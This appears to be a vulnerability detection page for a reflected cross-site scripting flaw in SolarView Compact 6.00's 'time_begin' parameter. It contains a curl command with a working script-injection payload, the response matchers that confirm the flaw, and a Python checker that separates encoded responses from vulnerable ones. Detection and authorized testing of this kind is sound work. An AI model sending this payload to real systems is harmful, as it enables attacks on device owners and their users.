Bug Name: SolarView Compact 6.00 - 'time_begin' Cross-Site Scripting
Severity: medium
Priority: P3
Risk Level: MEDIUM - 6/10
Description:
SolarView Compact version 6.00 contains a cross-site scripting vulnerability in the 'time_begin' parameter to Solar_History.php.
Exploit Commands
Bash
curl -i -s -k -X 'GET' \
'https://example.com/Solar_History.php?time_begin=xx%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E%3C%22&time_end=&event_level=0&event_pcs=1&search_on=on&search_off=on&word=hj%27&sort_type=0&record=10&command=%95%5C%8E%A6'
⚠️ Warning: These commands are for authorized security testing only. Unauthorized access is illegal.
Expected Matchers
- <script>alert(document.domain)</script><>
- /Solar_History.php METHOD=post>
- text/html
Status codes to expect: 200
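
The matchers above only confirm the issue when all of them hold together. The following is an added example, not part of the original write-up, that evaluates them against a response and reports which condition failed, so a patched or output-encoding device is not flagged. The function names and sample responses are constructed for illustration; the matcher strings are copied verbatim from the list above.

```python
# Matcher strings copied verbatim from the "Expected Matchers" list above.
BODY_MATCHERS = (
    "<script>alert(document.domain)</script><>",
    "/Solar_History.php METHOD=post>",
)
EXPECTED_STATUS = 200
EXPECTED_CTYPE = "text/html"


def failed_conditions(status, headers, body):
    """Return the names of the page's conditions that the response fails."""
    # HTTP header names are case-insensitive, so normalise before lookup.
    ctype = {k.lower(): v for k, v in headers.items()}.get("content-type", "")
    failed = []
    if status != EXPECTED_STATUS:
        failed.append("status")
    if EXPECTED_CTYPE not in ctype.lower():
        failed.append("content-type")
    for i, needle in enumerate(BODY_MATCHERS):
        if needle not in body:
            failed.append(f"body[{i}]")
    return failed


def is_affected(status, headers, body):
    """All conditions must hold; any single miss means 'not confirmed'."""
    return not failed_conditions(status, headers, body)


# Constructed sample responses (hypothetical markup, not captured traffic).
FORM = "<FORM ACTION=/Solar_History.php METHOD=post>"
RAW = FORM + "<INPUT VALUE=xx><script>alert(document.domain)</script><>"
ENCODED = FORM + "<INPUT VALUE=xx&lt;script&gt;alert(document.domain)&lt;/script&gt;>"
HTML = {"Content-Type": "text/html; charset=UTF-8"}

SAMPLES = {
    "unencoded reflection": (200, HTML, RAW),
    "entity-encoded reflection": (200, HTML, ENCODED),
    "raw payload but not rendered as HTML": (200, {"content-type": "text/plain"}, RAW),
    "error page": (404, HTML, RAW),
}

if __name__ == "__main__":
    for name, resp in SAMPLES.items():
        print(f"{name}: affected={is_affected(*resp)} failed={failed_conditions(*resp)}")
```

Only the first sample is reported as affected; the entity-encoded response fails the script matcher, which is the result to expect from a device that encodes 'time_begin' on output.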

